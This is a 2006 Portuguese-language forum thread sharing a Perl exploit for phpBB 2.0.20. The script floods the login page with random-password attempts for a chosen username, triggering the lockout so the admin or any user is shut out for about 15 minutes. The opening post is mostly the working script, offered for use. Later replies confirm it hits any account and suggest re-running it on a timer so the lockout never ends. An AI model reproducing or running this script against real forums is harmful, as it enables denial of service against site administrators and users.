[ phpBB 2.0.20 ] Disable Admin

Started by DarkGenesis, 27 de June , 2006, 12:41:12 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

DarkGenesis

27 de June , 2006, 12:41:12 AM
Code Select
###################################################################################
#!/usr/bin/perl
# Priv8 Exploit for PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
#Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];

$dirsend = "$dirc" . "login.php";
print "
   -------------------------------------
   phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username >
   --------------------------------------
   ";
$i=1;
if ($host ne ""){
while($OK ne 1){


use IO::Socket;
my($socket) ="";
   if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
                                       PeerPort => $port ,
                                       Proto    => "TCP"))
{


$password=rand();
$data  = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data";
read  $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;

}}
* This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min  ;)
Fonte: h4cky0u

#phobia

#1
27 de June , 2006, 11:37:40 AM
Huahuahua, parece bem legal! hehe
Vou testar... =)

Security

#2
11 de July , 2006, 01:24:54 AM
Esta Façanha Incapacita Admin Ou outro Usuário EM Foros de PHPBB Para 15 Min
ñ entendi mto..
que ele faz?
flw

DarkGenesis

#3
11 de July , 2006, 09:21:41 AM
Irá ficar incapaz de entrar no forum por um periodo de 15 mim.

branco

#4
11 de July , 2006, 01:19:15 PM
creio que oque ele faz é fica logando no forum, assim a conta do cara vai ser suspendida por 15m
Olha o trem... Quem vai ficar, quem vai partir? Quem vai chorar, quem vai sorrir?

Security

#5
15 de July , 2006, 11:45:12 AM
+ só de admin moderador ñ né?
vlw

HadeS

#6
15 de July , 2006, 11:10:46 PM
QUALQUER usuário.

HadeS

Anonymous

#7
16 de July , 2006, 03:27:14 AM
ele apenas faz tentativas mal sucedidas de logar com akele usuario
oq deixa suspenso o login do msmo por 30min

acho q saum preciso apenas 5 tentativas

slul

#8
16 de July , 2006, 04:20:51 AM
Quote from: "fuhrer"ele apenas faz tentativas mal sucedidas de logar com akele usuario
oq deixa suspenso o login do msmo por 30min

acho q saum preciso apenas 5 tentativas

sim e da pra otimizar o exploit tipo dando um microtime pra ele rodar de novo a cada 15 ou 30 minutos :)

nao sei da função microtime no perl

quem souber e quiser fazer tah aew a dica

acho q eh assim,

 inteh
Print
Go Up Pages1
User actions